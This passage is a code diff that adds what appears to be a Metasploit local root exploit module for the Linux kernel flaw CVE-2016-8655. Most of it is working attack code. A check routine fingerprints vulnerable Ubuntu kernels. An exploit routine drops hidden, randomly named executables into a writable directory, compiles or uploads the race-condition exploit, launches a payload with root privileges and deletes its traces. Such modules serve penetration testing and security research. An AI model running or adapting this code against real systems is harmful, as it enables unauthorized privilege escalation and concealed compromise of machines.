'94692' ], + [ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ], + [ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ], + [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ], + [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ], + [ 'URL', 'https://usn.ubuntu.com/3151-1/' ], + [ 'URL', 'https://www.securitytracker.com/id/1037403' ], + [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ] + ], + 'DefaultTarget' => 0)) + register_options [ + OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]), + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + ] + end + + def timeout + datastore['TIMEOUT'].to_i + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + end + + def upload_and_chmodx(path, data) + upload path, data + cmd_exec "chmod +x '#{path}'" + end + + def upload_and_compile(path, data) + upload "#{path}.c", data + + gcc_cmd = "gcc -o #{path} #{path}.c -lpthread" + if session.type.eql? 'shell' + gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" + end + output = cmd_exec gcc_cmd + rm_f "#{path}.c" + + unless output.blank? + print_error output + fail_with Failure::Unknown, "#{path}.c failed to compile" + end + + cmd_exec "chmod +x #{path}" + end + + def exploit_data(file) + path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file + fd = ::File.open path, 'rb' + data = fd.read fd.stat.size + fd.close + data + end + + def live_compile? + return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') + + if has_gcc? + vprint_good 'gcc is installed' + return true + end + + unless datastore['COMPILE'].eql? 'Auto' + fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' + end + end + + def check + version = kernel_release + unless version =~ /^4\.4\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/ + vprint_error "Linux kernel version #{version} is not vulnerable" + return CheckCode::Safe + end + vprint_good "Linux kernel version #{version} is vulnerable" + + arch = kernel_hardware + unless arch.include? 'x86_64' + vprint_error "System architecture #{arch} is not supported" + return CheckCode::Safe + end + vprint_good "System architecture #{arch} is supported" + + cores = get_cpu_info[:cores].to_i + min_required_cores = 2 + unless cores >= min_required_cores + vprint_error "System has less than #{min_required_cores} CPU cores" + return CheckCode::Safe + end + vprint_good "System has #{cores} CPU cores" + + unless userns_enabled? + vprint_error 'Unprivileged user namespaces are not permitted' + return CheckCode::Safe + end + vprint_good 'Unprivileged user namespaces are permitted' + + CheckCode::Appears + end + + def exploit + if check != CheckCode::Appears + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + # Upload exploit executable + executable_name = ".#{rand_text_alphanumeric rand(5..10)}" + executable_path = "#{base_dir}/#{executable_name}" + if live_compile? + vprint_status 'Live compiling exploit on system...' + upload_and_compile executable_path, exploit_data('chocobo_root.c') + else + vprint_status 'Dropping pre-compiled exploit on system...' + upload_and_chmodx executable_path, exploit_data('chocobo_root') + end + + # Upload payload executable + payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status "Launching exploit (Timeout: #{timeout})..." + output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout + output.each_line { |line| vprint_status line.chomp } + print_status "Cleaning up #{payload_path} and #{executable_path}.." + rm_f executable_path + rm_f payload_path + end +end